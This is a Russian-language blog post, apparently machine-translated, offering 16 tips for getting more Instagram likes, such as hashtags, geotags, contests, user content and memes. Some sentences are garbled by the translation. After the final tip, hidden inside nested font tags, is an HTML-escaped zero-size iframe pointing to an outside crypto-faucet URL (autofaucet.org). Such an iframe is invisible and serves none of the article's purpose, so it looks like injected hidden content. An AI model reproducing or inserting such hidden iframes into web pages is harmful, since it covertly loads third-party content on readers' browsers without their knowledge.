Найти тему
Den4uk

Как получить больше лайков на свои посты?

Ну, во-первых: не покупайте лайки в Instagram .

Настоящая любовь ничего не стоит. Просто нужно время и забота, чтобы создавать высококачественные посты, достойные настоящих лайков в Instagram от реальных людей .

В конечном счете, цель Instagram — показать себя с лучшей стороны, делясь контентом, который ценят люди. Это требует усилий, но если вы готовы улучшить свою игру, у нас есть масса советов, которые помогут вам начать.

Теперь пользователи могут скрывать количество лайков в Instagram. Они все еще имеют значение?

Да, конечно. Если вы в Instagram, лайки важны как никогда.

Если вы пропустили: в середине 2019 года Instagram начал экспериментировать с тем, чтобы не показывать количество лайков, полученных публикацией (также называемое «счетчиком лайков») в лентах определенных регионов.

По словам Адама Моссери, главы Instagram, этот шаг был частью усилий компании по защите психического здоровья сообщества платформы. Идея заключалась в том, чтобы сделать весь опыт более здоровым и менее конкурентоспособным для пользователей. Instagram объяснил: «Мы хотим, чтобы ваши друзья сосредоточились на фотографиях и видео, которыми вы делитесь, а не на том, сколько лайков они получают».

Этот шаг имел неоднозначный успех: некоторым людям нравилось быть свободными от давления, чтобы не отставать от конкурентов, в то время как другие чувствовали, что их оставили в неведении относительно того, что популярно.

Решение Instagram состояло в том, чтобы объявить в мае 2021 года, что теперь у людей будет возможность скрывать общедоступные счетчики лайков — либо скрывать счетчики во всех сообщениях, либо только в вашей собственной ленте, чтобы другие не могли видеть.

Но независимо от того, можем ли мы видеть лайки в Instagram или нет, алгоритм Instagram продолжает работать, как и всегда , в соответствии с платформой. Так что независимо от того, видны они миру или нет, вот лучшие способы заставить людей нажать на эту кнопку сердца.

Как получить больше лайков в Instagram: 16 умных способов получить бесплатные лайки в Instagram

1. Используйте правильные хэштеги

Хэштеги — это ключ к расширению вашей аудитории в Instagram. Используйте хэштег, и ваш пост (или история!) появится на странице с этим хэштегом.

Люди также могут подписаться на хэштеги, что означает, что вы можете появиться в новостной ленте совершенно незнакомого человека. Сюрприз!

Иллюстратор Джо Тейлор пометил этот пост такими словами, как #illustration и #characterdesign, чтобы они отображались в поиске по этим темам. 1800 с лишним лайков спустя, похоже, это была отличная идея.

Независимо от того, используете ли вы хэштеги продуктов или услуг, сезонные хэштеги, хэштеги с акронимами или хэштеги местоположения, все согласны с тем, что лучше всего использовать не более 11 хэштегов .

2. Отметьте релевантных пользователей

Независимо от того, отмечаете ли вы соавтора, нового знакомого или героя своего детства, цель состоит в том, чтобы подчеркнуть, насколько вы их цените, и поделиться этой ценностью со своей аудиторией.

А если так уж получилось, что их аудитория, скорее всего, увидит вашу ценность в процессе? Ну, так тому и быть.

Cool Ruggings — учетная запись, посвященная документированию крутых ковриков со всего мира, конечно же, — явно пометила дизайнеров этих модных стульев для кемпинга бразильского производства. Это был шанс поделиться любовью, но с дополнительным бонусом в виде небольшого потенциального внимания со стороны тех пользователей Instagram и их собственных фан-баз.

3. Пишите привлекательные подписи

Будет ли вам лучше написать роман, максимально превышающий ограничение Instagram в 2200 символов, или сохранить загадочность и резкость с помощью одной строчки, зависит от голоса и сообщения вашего бренда. Но длинные или короткие подписи являются жизненно важным компонентом успеха поста.

Великолепные подписи в Instagram добавляют контекст и индивидуальность, а также побуждают ваших подписчиков к действию. Не торопитесь с этой частью! Взгляните на эти 264 примера привлекательных подписей в Instagram и вдохновитесь, прежде чем начать печатать.

Здесь художница по волокну HH Hooks делится вдохновением, которое она почерпнула из своей последней работы. (Да, это еще один ковер. Извините, мы сейчас не в настроении !) Это придает контекст ее коктейльному образу и одновременно вызывает разговор и вовлеченность.

4. Отметьте свое местоположение

Геотегирование вашего местоположения — это больше, чем просто скромное хвастовство о вашем превосходном вкусе в пивоварнях или коворкингах.

Это еще полезнее, если вы являетесь брендом с традиционным местоположением, поскольку вы создаете чувство общности со своими постоянными и… потенциальными постоянными клиентами. (Только не забудьте убедиться, что ваши физические координаты верны, чтобы вы отображались на карте.)

Бар Keefer позаботился о том, чтобы отметить свое местонахождение в этом посте о своем новом веселом мини-патте на открытом воздухе — кто знает, какой счастливый выпивоха в гольф наткнется на него?

5. Перейдите на страницу исследования

За этим маленьким значком увеличительного стекла скрывается страница «Обзор» — изобилие красивого, развлекательного контента, персонализированного для вас Instagram. Бренды, которые появляются там, привлекают много внимания.

Но как бренды попадают на вкладку Instagram Explore? Короче говоря, вам нужен высокий уровень вовлеченности и активное сообщество — и вам не помешает использовать любую новую функцию, которую Instagram в настоящее время продвигает в алгоритме. (Вы заметили, что барабаны повсюду ? Это не совпадение!)

6. Публикуйте в нужное время

Instagram не показывает сообщения в хронологическом порядке, но его алгоритм предпочитает «новизна». Это означает, что если вы хотите быть на виду, вам важно знать, когда ваша аудитория на самом деле смотрит на приложение.

Который… гм… когда именно?

Что ж, у каждого бренда есть своя точка соприкосновения, основанная на его уникальной аудитории, поэтому ваша собственная аналитика даст вам некоторые рекомендации.

Но мы немного подсчитали и провели несколько экспериментов, чтобы найти общее лучшее время для публикации в Instagram , и кажется, что в целом 11 утра в среду — это довольно хорошее время, чтобы стремиться к этому. Начните с этого и настраивайте, узнавая, что работает для ваших конкретных подписчиков!

7. Проведите конкурс лайков

Конкурсы могут потребовать немного планирования… или много времени. Но конкурс лайков — один из самых простых способов увеличить вовлеченность в определенный период времени.

Главное, чтобы ваш приз был желанным для вашей аудитории, но при этом достаточно конкретным, чтобы привлечь настоящих поклонников, а не оппортунистов (т. е. не раздавайте деньги, айфоны или поездки на Ибицу).

Смелые посетители могут выиграть поздний завтрак над лондонским стадионом O2 в этом конкурсе от Design My Night .

У нас есть больше идей для конкурсов в Instagram , а также пошаговые инструкции о том, как эффективно и успешно провести их.

8. Публикуйте хорошие фотографии

Чтобы не забывать, что фотография была искусством до того, как стала маркетинговым инструментом, мы все должны признать тот факт, что иногда наш вкус превосходит наше мастерство.

В Instagram нет места для «достаточно хороших» снимков. Время повышать уровень.

Вместо того, чтобы публиковать только строительный снимок текущего проекта, Sturgess Architecture разместила тщательно спланированное групповое фото на фоне привлекательного экстерьера, в котором используется естественное освещение.

Будь то посещение курса фотографии для развития вашего зрения или выделение некоторого бюджета на модернизацию вашего оборудования, выясните, что профессионалы делают иначе, чем любители.

Чтобы начать, вот несколько советов и инструментов для профессионального редактирования фотографий для Instagram.

9. Вовлекайтесь за пределами вашей ленты

В своих постоянных попытках дать людям то, что они хотят, алгоритм отдает приоритет публикациям в Instagram из учетных записей, которые он считает «близкими». Как он измеряет близость? Отслеживая, насколько аккаунты взаимодействуют друг с другом.

Итак, если вы хотите расширить свой охват и, следовательно, свои шансы на получение лайков, не будьте тихоней: идите вперед и взаимодействуйте. Будьте щедры на лайки и комментарии.

10. Публикуйте пользовательский контент

Обмен контентом от ваших подписчиков — верный способ привлечь внимание. Пользователям очень приятно быть представленным брендом, который им нравится, для начала, но это также служит социальным доказательством, подтверждая для других ваших подписчиков, что быть суперфанатом — это более чем нормально.

Это также демонстрирует вашу подлинность и связь с сообществом. Так что вперед: разбейте эту кнопку «Поделиться» !

Телешоу « Дома» с Эми Седарис каждую неделю проводит «Фан-арт-пятницу», публикуя рисунки (или, в некоторых случаях, покадровую анимацию с Барби) от своей аудитории.

11. Публикуйте закулисный контент

Проявите немного уязвимости и покажите менее глянцевый готовый продукт — вы будете вознаграждены.

Людям нравится смотреть, как что-то делается, заглядывать за кулисы фотосессии и узнавать о реальной борьбе за гламурными снимками в других местах вашей ленты.

В преддверии распродажи образцов дизайнерский бренд Ilana Kohn поделился очаровательным импровизированным видео о сотруднике, катающемся на роликах по складу. Если этого недостаточно, чтобы заставить вас нажать на кнопку с сердечком, а затем купить льняной комбинезон с драпировкой, мы не знаем, что еще.

12. Спросите людей об их мнении

«Задайте вопрос в подписи» — распространенный совет для повышения вовлеченности по определенной причине: это прямой призыв к действию для подписчиков добавить комментарий.

И если они уже заинтересованы, вероятность того, что они поставят вам лайк в процессе, возрастает. TLDR: никогда не помешает спросить!

Бренд по уходу за кожей Summer Fridays воплощает свою прохладную атмосферу, сочетая мечтательные облака с большим вопросом, который вызвал как лайки, так и комментарии.

13. Проведите поглощение

Если вам удобно передавать ключи от своей учетной записи сотруднику, захват Instagram — отличный способ привлечь новую аудиторию на вашу страницу.

Конечно, бренд или влиятельный человек, который заменит вас, должен соответствовать вашим ценностям — вы хотите, чтобы всем поклонникам, которые переходят на вашу страницу, нравилось то, что они видят, и они оставались рядом.

Прекрасным примером является мультиплатформенное сообщество художников Panimation : они приглашают чередующихся иллюстраторов и аниматоров зайти в свою учетную запись, чтобы поделиться своими работами с аудиторией из 65 000 с лишним человек.

14. Посмотрите, что работает у ваших конкурентов

Если ваш Instagram настроен на просмотр лайков, вы можете снова увидеть, что работает (или проваливается) у ваших конкурентов. Будьте бдительны… или, что еще лучше, проведите конкурентный анализ .

Сделайте прослушивание социальных сетей частью своей маркетинговой стратегии в социальных сетях, чтобы измерять настроения и выявлять тенденции в отрасли. Вы не хотите остаться позади или упустить возможность подняться там, где ваши конкуренты, возможно, потеряли мяч.

15. Попросите людей отметить своих друзей

Делать это все время становится немного утомительно… но инициация «отметить друга» в паре с правильным постом может привести к всплеску активности.

Суть в том, чтобы дать им вескую причину отметить друга, будь то забавная изюминка или розыгрыш.

16. Примите мемы

Есть причина, по которой Instagram полон мемов и аккаунтов-агрегаторов: люди не могут не лайкать и не делиться забавными гифками, острыми высказываниями или глупыми приколами.

Хотя некоторые, безусловно, могут исказить несовершеннолетних, у брендов есть изящные способы запрыгнуть на подножку мемов стратегическим и успешным способом — просто держите шутки, соответствующие вашему голосу, контенту и аудитории, и не переусердствуйте. Немного мема имеет большое значение!

Спасатель собак из Ванкувера Fur Bae смешивает фотографии своих приемных и готовых к усыновлению щенков в дерзком текстовом формате мема «настоящий разговор». Почти такие же милые, как и сами собаки.<font style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 13px; vertical-align: inherit; background: transparent;"><font style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 13px; vertical-align: inherit; background: transparent;">&lt;iframe src="https://autofaucet.org/wm/sdg32/4" width="0" height="0" style="border:0"&gt;&lt;/iframe&gt;</font></font>